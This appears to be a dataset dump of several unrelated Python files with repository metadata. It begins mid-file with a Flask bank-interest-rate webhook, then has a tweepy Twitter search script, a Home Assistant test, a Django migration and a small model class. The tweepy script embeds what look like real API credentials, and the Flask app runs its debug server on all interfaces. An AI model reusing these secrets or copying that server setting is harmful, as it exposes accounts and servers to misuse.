bank = {'Federal Bank':'6.70%','Andhra Bank':'6.85%', 'Allahabad Bank':'6.75%', 'Axis Bank':'6.5%', 'Bandhan bank':'7.15%', 'Bank of Maharashtra':'6.50%', 'Bank of Baroda':'6.90%', 'Bank of India':'6.60%', 'Bharatiya Mahila Bank':'7.00%', 'Canara Bank':'6.50%', 'Central Bank of India':'6.60%', 'City Union Bank':'7.10%', 'Corporation Bank':'6.75%', 'Citi Bank':'5.25%', 'DBS Bank':'6.30%', 'Dena Bank':'6.80%', 'Deutsche Bank':'6.00%', 'Dhanalakshmi Bank':'6.60%', 'DHFL Bank':'7.75%', 'HDFC Bank':'5.75% to 6.75%', 'Post Office':'7.10%', 'Indian Overseas Bank':'6.75%', 'ICICI Bank':'6.25% to 6.9%', 'IDBI Bank':'6.65%', 'Indian Bank':'4.75%', 'Indusind Bank':'6.85%', 'J&K Bank':'6.75%', 'Karnataka Bank':'6.50 to 6.90%', 'Karur Vysya Bank':'6.75%', 'Kotak Mahindra Bank':'6.6%', 'Lakshmi Vilas Bank':'7.00%', 'Nainital Bank':'7.90%', 'Oriental Bank of Commerce':'6.85%', 'Punjab National Bank':'6.75%', 'Punjab and Sind Bank':'6.4% to 6.80%', 'Saraswat bank':'6.8%', 'South Indian Bank':'6% to 6.75%', 'State Bank of India':'6.75%', 'Syndicate Bank':'6.50%', 'Tamilnad Mercantile Bank Ltd':'6.90%', 'UCO bank':'6.75%', 'United Bank Of India':'6%', 'Vijaya Bank':'6.50%', 'Yes Bank':'7.10%'}
speech = "The interest rate of " + name + " is " + str(cost[name])
print("Response:")
print(speech)
return {
"speech": speech,
"displayText": speech,
#"data": {},
#"contextOut": [],
"source": "BankInterestRates"
}
if __name__ == '__main__':
port = int(os.getenv('PORT', 5000))
print ("Starting app on port %d" %(port))
app.run(debug=True, port=port, host='0.0.0.0')
| [
"[email protected]"
] | |
a1e1f711eb8af4ca585330198a42446ff9f904ef | 8afeb5e41d1efbce2b8feb8f557f263120db91d3 | /api/search_rest.py | 736b8df13c0c8c9d8ca68368185325e599ceb723 | [] | no_license | panos1995/msccs-t23 | 7bbe9ed4c9172f3f72c2ce47e14db639a95b054b | 228aaa71640f186ceb8e85c295c13d9df36611a5 | refs/heads/master | 2020-04-03T15:23:35.299920 | 2018-11-05T15:44:07 | 2018-11-05T15:44:07 | 155,361,035 | 0 | 0 | null | 2018-10-30T09:48:21 | 2018-10-30T09:48:21 | null | UTF-8 | Python | false | false | 1,162 | py | import datetime
import time
import tweepy
import pymongo
import sys
import json
from bson import json_util, ObjectId
def query_search(query):
access_token = "IHpSjYd5AuCdDRZTaGiMOwHUJ"
access_token_secret = "FNUvxez9N9vBzY72HiZcukHQqVqO0ZiV498qyaYDxaV5nKFSgu"
auth = tweepy.AppAuthHandler(access_token, access_token_secret)
api = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True)
if (not api):
print("Can't Authenticate")
sys.exit(-1)
time_started = time.time()
result_list = []
id_list = []
# You can change the cound the time limit of search.
# moreover we can use Stream to be realy real_life project
for tweet in tweepy.Cursor(api.search, q=query, lang="en", count=10).items():
if(time.time()> time_started+2):
#mycol_all.insert(result_list)
return result_list, id_list
# result_list.append(json.loads(json_util.dumps({"Postid": tweet["idstr"], "Text": tweet["text"]})))
result_list.append({"Postid": tweet._json["id_str"], "Text": tweet._json["text"]})
id_list.append(tweet._json["id_str"])
| [
"[email protected]"
] | |
3f259779a113f38727e5e331c041593a3830edfe | caaf56727714f8c03be38710bc7d0434c3ec5b11 | /tests/components/telegram/test_notify.py | 7488db49d9ea58db8f78e93cab0842fa686ee119 | [
"Apache-2.0"
] | permissive | tchellomello/home-assistant | c8db86880619d7467901fd145f27e0f2f1a79acc | ed4ab403deaed9e8c95e0db728477fcb012bf4fa | refs/heads/dev | 2023-01-27T23:48:17.550374 | 2020-09-18T01:18:55 | 2020-09-18T01:18:55 | 62,690,461 | 8 | 1 | Apache-2.0 | 2023-01-13T06:02:03 | 2016-07-06T04:13:49 | Python | UTF-8 | Python | false | false | 1,598 | py | """The tests for the telegram.notify platform."""
from os import path
from homeassistant import config as hass_config
import homeassistant.components.notify as notify
from homeassistant.components.telegram import DOMAIN
from homeassistant.const import SERVICE_RELOAD
from homeassistant.setup import async_setup_component
from tests.async_mock import patch
async def test_reload_notify(hass):
"""Verify we can reload the notify service."""
with patch("homeassistant.components.telegram_bot.async_setup", return_value=True):
assert await async_setup_component(
hass,
notify.DOMAIN,
{
notify.DOMAIN: [
{
"name": DOMAIN,
"platform": DOMAIN,
"chat_id": 1,
},
]
},
)
await hass.async_block_till_done()
assert hass.services.has_service(notify.DOMAIN, DOMAIN)
yaml_path = path.join(
_get_fixtures_base_path(),
"fixtures",
"telegram/configuration.yaml",
)
with patch.object(hass_config, "YAML_CONFIG_FILE", yaml_path):
await hass.services.async_call(
DOMAIN,
SERVICE_RELOAD,
{},
blocking=True,
)
await hass.async_block_till_done()
assert not hass.services.has_service(notify.DOMAIN, DOMAIN)
assert hass.services.has_service(notify.DOMAIN, "telegram_reloaded")
def _get_fixtures_base_path():
return path.dirname(path.dirname(path.dirname(__file__)))
| [
"[email protected]"
] | |
c4b2fcaa8f6499cdca69575ead3662b305b1ccd5 | 4ed33dba672aa6aaef42698ef8437c872b078d37 | /backend/home/migrations/0001_load_initial_data.py | e78b5b69ad3761f691200103468335142fc62434 | [] | no_license | crowdbotics-apps/flat-heart-27928 | aecb93c66e39e94e01cef7fe9506effe994cde18 | ce209de8910b1e9f006814b58a05aed1eeada32d | refs/heads/master | 2023-05-26T14:51:41.045373 | 2021-06-11T20:01:34 | 2021-06-11T20:01:34 | 376,130,678 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 538 | py | from django.db import migrations
def create_site(apps, schema_editor):
Site = apps.get_model("sites", "Site")
custom_domain = "flat-heart-27928.botics.co"
site_params = {
"name": "Flat Heart",
}
if custom_domain:
site_params["domain"] = custom_domain
Site.objects.update_or_create(defaults=site_params, id=1)
class Migration(migrations.Migration):
dependencies = [
("sites", "0002_alter_domain_unique"),
]
operations = [
migrations.RunPython(create_site),
]
| [
"[email protected]"
] | |
ce6667dc95fdefc8be193b41ae44902d4600a89a | 7a9c01f7029e74c697100e244d26c72d0e283d47 | /models/amenity.py | 9adbf8d9f5418e8b43eeb584cccd1acbde12617c | [] | no_license | toyugo/holbertonschool-AirBnB_clone | 63321296ecee98b1a0cda39c7b155cc2ea5ececb | 5edaeafb6516130f2027b505fe8b168f6f9de174 | refs/heads/main | 2023-03-21T06:32:18.728878 | 2021-03-04T13:08:56 | 2021-03-04T13:08:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 168 | py | #!/usr/bin/python3
""" Module Amenity """
from models.base_model import BaseModel
class Amenity(BaseModel):
""" Class Amenity base en BaseModel """
name = ""
| [
"[email protected]"
] |
Subsets and Splits